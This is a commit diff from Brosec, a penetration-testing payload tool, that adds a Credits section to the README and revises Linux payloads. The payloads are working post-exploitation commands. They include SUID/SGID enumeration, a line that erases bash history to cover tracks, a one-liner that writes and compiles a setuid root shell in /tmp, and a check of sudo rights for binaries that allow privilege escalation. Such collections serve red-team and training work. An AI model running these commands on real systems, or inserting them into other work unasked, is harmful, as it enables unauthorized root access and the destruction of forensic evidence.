Minor improvements to a few payloads, added a Credits section to the …

…README
gabemarshall · Jun 29, 2016 · e9dda63 · e9dda63
1 parent 12b8686
commit e9dda63
Show file tree

Hide file tree

Showing 2 changed files with 15 additions and 13 deletions.
diff --git a/README.md b/README.md
@@ -104,3 +104,15 @@ Swag
 <br><br> Submit a pull request, create an issue, or just send feedback to <[email protected]> and I'll happily send you a sticker (supplies limited, free shipping to continental US only).
 
 Otherwise you can order one from [StickerMule](https://www.stickermule.com/marketplace/10877-brosec-security-for-bros)
+
+
+Credits
+======
+
+Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In addition, many payloads were referenced from other resources and deserve a shoutout.
+
+- [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
+- [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
+- [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)
+
+Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor)
diff --git a/payloads/linux.js b/payloads/linux.js
@@ -83,8 +83,8 @@ Load({
 // Linux File Commands pg 6
 Load({ payload: "diff file1 file2", desc: "Compare two files", category: "File System"})
 Load({ payload: "strings -n 5", desc: "Set minimum string length", category: "File System"})
-Load({ payload: "find / -perm +6000 -type f -exec ls -ld {} \\;", desc: "Find all SUID binaries", category: "File System"})
-Load({ payload: "find . -type f -mmin -5 -not -path \"*/proc/*\" 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"})
+Load({ payload: "find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null", desc: "Find all SUID and SGID files", category: "File System"})
+Load({ payload: "find . -type f -mmin -5 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"})
 
 Load({
 	desc: "Find files and grep results",
@@ -218,20 +218,10 @@ Load({ payload: "rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null", des
 
 // ############### Privesc  ######################
 
-// Load({
-// 	desc: "Find files and grep results",
-// 	payload: "find . -type f -exec grep -IHin '<PROMPT (search string)>' 2>/dev/null {} +",
-// 	callback: function(bro){
-// 		question("What search term would you like to use?");
-// 		ask.some(questions, bro);
-// 	},
-// 	category: "File System"
-// })
-
 // Credit to @LuxCupitor
 Load({ title: "Write r00t.c to the /tmp directory and compile", payload: "echo -e '#include <unistd.h>\\nint main(int argc, char **argv)\\n{\\nsetuid(0);\\nsetgid(0);\\nexecl(\"/bin/sh\", \"sh\", NULL);\\nreturn 1;\\n}\\n' > /tmp/r00t.c;gcc /tmp/r00t.c -o /tmp/r00t", category: "Privesc"})
 Load({ title: "Check for privesc via sudo privileges", payload: "sudo -S -l 2>/dev/null | grep -w 'nmap\\|perl\\|awk\\|find\\|bash\\|sh\\|man\\|more\\|less\\|vi\\|vim\\|nc\\|netcat\\|python\\|ruby\\|lua\\|irb\\|chown\\|chmod\\|zip\\|tar\\|tcpdump\\|gdb'", category: "Privesc"})
-// 
+//
 /*
 ######################################################
 ############### End of Payloads ######################